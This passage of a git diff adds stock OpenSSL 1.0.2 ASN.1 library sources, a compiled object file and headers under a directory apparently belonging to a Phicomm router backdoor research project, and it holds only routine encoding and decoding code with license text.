+/* crypto/asn1/asn1_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <limits.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1_mac.h>
+
+static int asn1_get_length(const unsigned char **pp, int *inf, long *rl,
+                           int max);
+static void asn1_put_length(unsigned char **pp, int length);
+const char ASN1_version[] = "ASN.1" OPENSSL_VERSION_PTEXT;
+
+static int _asn1_check_infinite_end(const unsigned char **p, long len)
+{
+    /*
+     * If there is 0 or 1 byte left, the length check should pick things up
+     */
+    if (len <= 0)
+        return (1);
+    else if ((len >= 2) && ((*p)[0] == 0) && ((*p)[1] == 0)) {
+        (*p) += 2;
+        return (1);
+    }
+    return (0);
+}
+
+int ASN1_check_infinite_end(unsigned char **p, long len)
+{
+    return _asn1_check_infinite_end((const unsigned char **)p, len);
+}
+
+int ASN1_const_check_infinite_end(const unsigned char **p, long len)
+{
+    return _asn1_check_infinite_end(p, len);
+}
+
+int ASN1_get_object(const unsigned char **pp, long *plength, int *ptag,
+                    int *pclass, long omax)
+{
+    int i, ret;
+    long l;
+    const unsigned char *p = *pp;
+    int tag, xclass, inf;
+    long max = omax;
+
+    if (!max)
+        goto err;
+    ret = (*p & V_ASN1_CONSTRUCTED);
+    xclass = (*p & V_ASN1_PRIVATE);
+    i = *p & V_ASN1_PRIMITIVE_TAG;
+    if (i == V_ASN1_PRIMITIVE_TAG) { /* high-tag */
+        p++;
+        if (--max == 0)
+            goto err;
+        l = 0;
+        while (*p & 0x80) {
+            l <<= 7L;
+            l |= *(p++) & 0x7f;
+            if (--max == 0)
+                goto err;
+            if (l > (INT_MAX >> 7L))
+                goto err;
+        }
+        l <<= 7L;
+        l |= *(p++) & 0x7f;
+        tag = (int)l;
+        if (--max == 0)
+            goto err;
+    } else {
+        tag = i;
+        p++;
+        if (--max == 0)
+            goto err;
+    }
+    *ptag = tag;
+    *pclass = xclass;
+    if (!asn1_get_length(&p, &inf, plength, (int)max))
+        goto err;
+
+    if (inf && !(ret & V_ASN1_CONSTRUCTED))
+        goto err;
+
+#if 0
+    fprintf(stderr, "p=%d + *plength=%ld > omax=%ld + *pp=%d  (%d > %d)\n",
+            (int)p, *plength, omax, (int)*pp, (int)(p + *plength),
+            (int)(omax + *pp));
+
+#endif
+    if (*plength > (omax - (p - *pp))) {
+        ASN1err(ASN1_F_ASN1_GET_OBJECT, ASN1_R_TOO_LONG);
+        /*
+         * Set this so that even if things are not long enough the values are
+         * set correctly
+         */
+        ret |= 0x80;
+    }
+    *pp = p;
+    return (ret | inf);
+ err:
+    ASN1err(ASN1_F_ASN1_GET_OBJECT, ASN1_R_HEADER_TOO_LONG);
+    return (0x80);
+}
+
+static int asn1_get_length(const unsigned char **pp, int *inf, long *rl,
+                           int max)
+{
+    const unsigned char *p = *pp;
+    unsigned long ret = 0;
+    unsigned int i;
+
+    if (max-- < 1)
+        return (0);
+    if (*p == 0x80) {
+        *inf = 1;
+        ret = 0;
+        p++;
+    } else {
+        *inf = 0;
+        i = *p & 0x7f;
+        if (*(p++) & 0x80) {
+            if (i > sizeof(long))
+                return 0;
+            if (max-- == 0)
+                return (0);
+            while (i-- > 0) {
+                ret <<= 8L;
+                ret |= *(p++);
+                if (max-- == 0)
+                    return (0);
+            }
+        } else
+            ret = i;
+    }
+    if (ret > LONG_MAX)
+        return 0;
+    *pp = p;
+    *rl = (long)ret;
+    return (1);
+}
+
+/*
+ * class 0 is constructed constructed == 2 for indefinite length constructed
+ */
+void ASN1_put_object(unsigned char **pp, int constructed, int length, int tag,
+                     int xclass)
+{
+    unsigned char *p = *pp;
+    int i, ttag;
+
+    i = (constructed) ? V_ASN1_CONSTRUCTED : 0;
+    i |= (xclass & V_ASN1_PRIVATE);
+    if (tag < 31)
+        *(p++) = i | (tag & V_ASN1_PRIMITIVE_TAG);
+    else {
+        *(p++) = i | V_ASN1_PRIMITIVE_TAG;
+        for (i = 0, ttag = tag; ttag > 0; i++)
+            ttag >>= 7;
+        ttag = i;
+        while (i-- > 0) {
+            p[i] = tag & 0x7f;
+            if (i != (ttag - 1))
+                p[i] |= 0x80;
+            tag >>= 7;
+        }
+        p += ttag;
+    }
+    if (constructed == 2)
+        *(p++) = 0x80;
+    else
+        asn1_put_length(&p, length);
+    *pp = p;
+}
+
+int ASN1_put_eoc(unsigned char **pp)
+{
+    unsigned char *p = *pp;
+    *p++ = 0;
+    *p++ = 0;
+    *pp = p;
+    return 2;
+}
+
+static void asn1_put_length(unsigned char **pp, int length)
+{
+    unsigned char *p = *pp;
+    int i, l;
+    if (length <= 127)
+        *(p++) = (unsigned char)length;
+    else {
+        l = length;
+        for (i = 0; l > 0; i++)
+            l >>= 8;
+        *(p++) = i | 0x80;
+        l = i;
+        while (i-- > 0) {
+            p[i] = length & 0xff;
+            length >>= 8;
+        }
+        p += l;
+    }
+    *pp = p;
+}
+
+int ASN1_object_size(int constructed, int length, int tag)
+{
+    int ret;
+
+    ret = length;
+    ret++;
+    if (tag >= 31) {
+        while (tag > 0) {
+            tag >>= 7;
+            ret++;
+        }
+    }
+    if (constructed == 2)
+        return ret + 3;
+    ret++;
+    if (length > 127) {
+        while (length > 0) {
+            length >>= 8;
+            ret++;
+        }
+    }
+    return (ret);
+}
+
+static int _asn1_Finish(ASN1_const_CTX *c)
+{
+    if ((c->inf == (1 | V_ASN1_CONSTRUCTED)) && (!c->eos)) {
+        if (!ASN1_const_check_infinite_end(&c->p, c->slen)) {
+            c->error = ERR_R_MISSING_ASN1_EOS;
+            return (0);
+        }
+    }
+    if (((c->slen != 0) && !(c->inf & 1)) || ((c->slen < 0) && (c->inf & 1))) {
+        c->error = ERR_R_ASN1_LENGTH_MISMATCH;
+        return (0);
+    }
+    return (1);
+}
+
+int asn1_Finish(ASN1_CTX *c)
+{
+    return _asn1_Finish((ASN1_const_CTX *)c);
+}
+
+int asn1_const_Finish(ASN1_const_CTX *c)
+{
+    return _asn1_Finish(c);
+}
+
+int asn1_GetSequence(ASN1_const_CTX *c, long *length)
+{
+    const unsigned char *q;
+
+    q = c->p;
+    c->inf = ASN1_get_object(&(c->p), &(c->slen), &(c->tag), &(c->xclass),
+                             *length);
+    if (c->inf & 0x80) {
+        c->error = ERR_R_BAD_GET_ASN1_OBJECT_CALL;
+        return (0);
+    }
+    if (c->tag != V_ASN1_SEQUENCE) {
+        c->error = ERR_R_EXPECTING_AN_ASN1_SEQUENCE;
+        return (0);
+    }
+    (*length) -= (c->p - q);
+    if (c->max && (*length < 0)) {
+        c->error = ERR_R_ASN1_LENGTH_MISMATCH;
+        return (0);
+    }
+    if (c->inf == (1 | V_ASN1_CONSTRUCTED))
+        c->slen = *length + *(c->pp) - c->p;
+    c->eos = 0;
+    return (1);
+}
+
+int ASN1_STRING_copy(ASN1_STRING *dst, const ASN1_STRING *str)
+{
+    if (str == NULL)
+        return 0;
+    dst->type = str->type;
+    if (!ASN1_STRING_set(dst, str->data, str->length))
+        return 0;
+    dst->flags = str->flags;
+    return 1;
+}
+
+ASN1_STRING *ASN1_STRING_dup(const ASN1_STRING *str)
+{
+    ASN1_STRING *ret;
+    if (!str)
+        return NULL;
+    ret = ASN1_STRING_new();
+    if (!ret)
+        return NULL;
+    if (!ASN1_STRING_copy(ret, str)) {
+        ASN1_STRING_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+int ASN1_STRING_set(ASN1_STRING *str, const void *_data, int len)
+{
+    unsigned char *c;
+    const char *data = _data;
+
+    if (len < 0) {
+        if (data == NULL)
+            return (0);
+        else
+            len = strlen(data);
+    }
+    if ((str->length < len) || (str->data == NULL)) {
+        c = str->data;
+        if (c == NULL)
+            str->data = OPENSSL_malloc(len + 1);
+        else
+            str->data = OPENSSL_realloc(c, len + 1);
+
+        if (str->data == NULL) {
+            ASN1err(ASN1_F_ASN1_STRING_SET, ERR_R_MALLOC_FAILURE);
+            str->data = c;
+            return (0);
+        }
+    }
+    str->length = len;
+    if (data != NULL) {
+        memcpy(str->data, data, len);
+        /* an allowance for strings :-) */
+        str->data[len] = '\0';
+    }
+    return (1);
+}
+
+void ASN1_STRING_set0(ASN1_STRING *str, void *data, int len)
+{
+    if (str->data)
+        OPENSSL_free(str->data);
+    str->data = data;
+    str->length = len;
+}
+
+ASN1_STRING *ASN1_STRING_new(void)
+{
+    return (ASN1_STRING_type_new(V_ASN1_OCTET_STRING));
+}
+
+ASN1_STRING *ASN1_STRING_type_new(int type)
+{
+    ASN1_STRING *ret;
+
+    ret = (ASN1_STRING *)OPENSSL_malloc(sizeof(ASN1_STRING));
+    if (ret == NULL) {
+        ASN1err(ASN1_F_ASN1_STRING_TYPE_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->length = 0;
+    ret->type = type;
+    ret->data = NULL;
+    ret->flags = 0;
+    return (ret);
+}
+
+void ASN1_STRING_free(ASN1_STRING *a)
+{
+    if (a == NULL)
+        return;
+    if (a->data && !(a->flags & ASN1_STRING_FLAG_NDEF))
+        OPENSSL_free(a->data);
+    OPENSSL_free(a);
+}
+
+int ASN1_STRING_cmp(const ASN1_STRING *a, const ASN1_STRING *b)
+{
+    int i;
+
+    i = (a->length - b->length);
+    if (i == 0) {
+        i = memcmp(a->data, b->data, a->length);
+        if (i == 0)
+            return (a->type - b->type);
+        else
+            return (i);
+    } else
+        return (i);
+}
+
+void asn1_add_error(const unsigned char *address, int offset)
+{
+    char buf1[DECIMAL_SIZE(address) + 1], buf2[DECIMAL_SIZE(offset) + 1];
+
+    BIO_snprintf(buf1, sizeof buf1, "%lu", (unsigned long)address);
+    BIO_snprintf(buf2, sizeof buf2, "%d", offset);
+    ERR_add_error_data(4, "address=", buf1, " offset=", buf2);
+}
+
+int ASN1_STRING_length(const ASN1_STRING *x)
+{
+    return M_ASN1_STRING_length(x);
+}
+
+void ASN1_STRING_length_set(ASN1_STRING *x, int len)
+{
+    M_ASN1_STRING_length_set(x, len);
+    return;
+}
+
+int ASN1_STRING_type(ASN1_STRING *x)
+{
+    return M_ASN1_STRING_type(x);
+}
+
+unsigned char *ASN1_STRING_data(ASN1_STRING *x)
+{
+    return M_ASN1_STRING_data(x);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..c2bf3369afeb927bb31696f0d7a4c7aa61a4fefa
GIT binary patch
literal 6928
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
I;;&u)->c|UzyJUM

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_locl.h
new file mode 100644
index 0000000..4c004fa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_locl.h
@@ -0,0 +1,135 @@
+/* asn1t.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* Internal ASN1 structures and functions: not for application use */
+
+int asn1_utctime_to_tm(struct tm *tm, const ASN1_UTCTIME *d);
+int asn1_generalizedtime_to_tm(struct tm *tm, const ASN1_GENERALIZEDTIME *d);
+
+/* ASN1 print context structure */
+
+struct asn1_pctx_st {
+    unsigned long flags;
+    unsigned long nm_flags;
+    unsigned long cert_flags;
+    unsigned long oid_flags;
+    unsigned long str_flags;
+} /* ASN1_PCTX */ ;
+
+/* ASN1 public key method structure */
+
+struct evp_pkey_asn1_method_st {
+    int pkey_id;
+    int pkey_base_id;
+    unsigned long pkey_flags;
+    char *pem_str;
+    char *info;
+    int (*pub_decode) (EVP_PKEY *pk, X509_PUBKEY *pub);
+    int (*pub_encode) (X509_PUBKEY *pub, const EVP_PKEY *pk);
+    int (*pub_cmp) (const EVP_PKEY *a, const EVP_PKEY *b);
+    int (*pub_print) (BIO *out, const EVP_PKEY *pkey, int indent,
+                      ASN1_PCTX *pctx);
+    int (*priv_decode) (EVP_PKEY *pk, PKCS8_PRIV_KEY_INFO *p8inf);
+    int (*priv_encode) (PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pk);
+    int (*priv_print) (BIO *out, const EVP_PKEY *pkey, int indent,
+                       ASN1_PCTX *pctx);
+    int (*pkey_size) (const EVP_PKEY *pk);
+    int (*pkey_bits) (const EVP_PKEY *pk);
+    int (*param_decode) (EVP_PKEY *pkey,
+                         const unsigned char **pder, int derlen);
+    int (*param_encode) (const EVP_PKEY *pkey, unsigned char **pder);
+    int (*param_missing) (const EVP_PKEY *pk);
+    int (*param_copy) (EVP_PKEY *to, const EVP_PKEY *from);
+    int (*param_cmp) (const EVP_PKEY *a, const EVP_PKEY *b);
+    int (*param_print) (BIO *out, const EVP_PKEY *pkey, int indent,
+                        ASN1_PCTX *pctx);
+    int (*sig_print) (BIO *out,
+                      const X509_ALGOR *sigalg, const ASN1_STRING *sig,
+                      int indent, ASN1_PCTX *pctx);
+    void (*pkey_free) (EVP_PKEY *pkey);
+    int (*pkey_ctrl) (EVP_PKEY *pkey, int op, long arg1, void *arg2);
+    /* Legacy functions for old PEM */
+    int (*old_priv_decode) (EVP_PKEY *pkey,
+                            const unsigned char **pder, int derlen);
+    int (*old_priv_encode) (const EVP_PKEY *pkey, unsigned char **pder);
+    /* Custom ASN1 signature verification */
+    int (*item_verify) (EVP_MD_CTX *ctx, const ASN1_ITEM *it, void *asn,
+                        X509_ALGOR *a, ASN1_BIT_STRING *sig, EVP_PKEY *pkey);
+    int (*item_sign) (EVP_MD_CTX *ctx, const ASN1_ITEM *it, void *asn,
+                      X509_ALGOR *alg1, X509_ALGOR *alg2,
+                      ASN1_BIT_STRING *sig);
+} /* EVP_PKEY_ASN1_METHOD */ ;
+
+/*
+ * Method to handle CRL access. In general a CRL could be very large (several
+ * Mb) and can consume large amounts of resources if stored in memory by
+ * multiple processes. This method allows general CRL operations to be
+ * redirected to more efficient callbacks: for example a CRL entry database.
+ */
+
+#define X509_CRL_METHOD_DYNAMIC         1
+
+struct x509_crl_method_st {
+    int flags;
+    int (*crl_init) (X509_CRL *crl);
+    int (*crl_free) (X509_CRL *crl);
+    int (*crl_lookup) (X509_CRL *crl, X509_REVOKED **ret,
+                       ASN1_INTEGER *ser, X509_NAME *issuer);
+    int (*crl_verify) (X509_CRL *crl, EVP_PKEY *pk);
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_mac.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_mac.h
new file mode 100644
index 0000000..abc6dc3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn1_mac.h
@@ -0,0 +1,579 @@
+/* crypto/asn1/asn1_mac.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
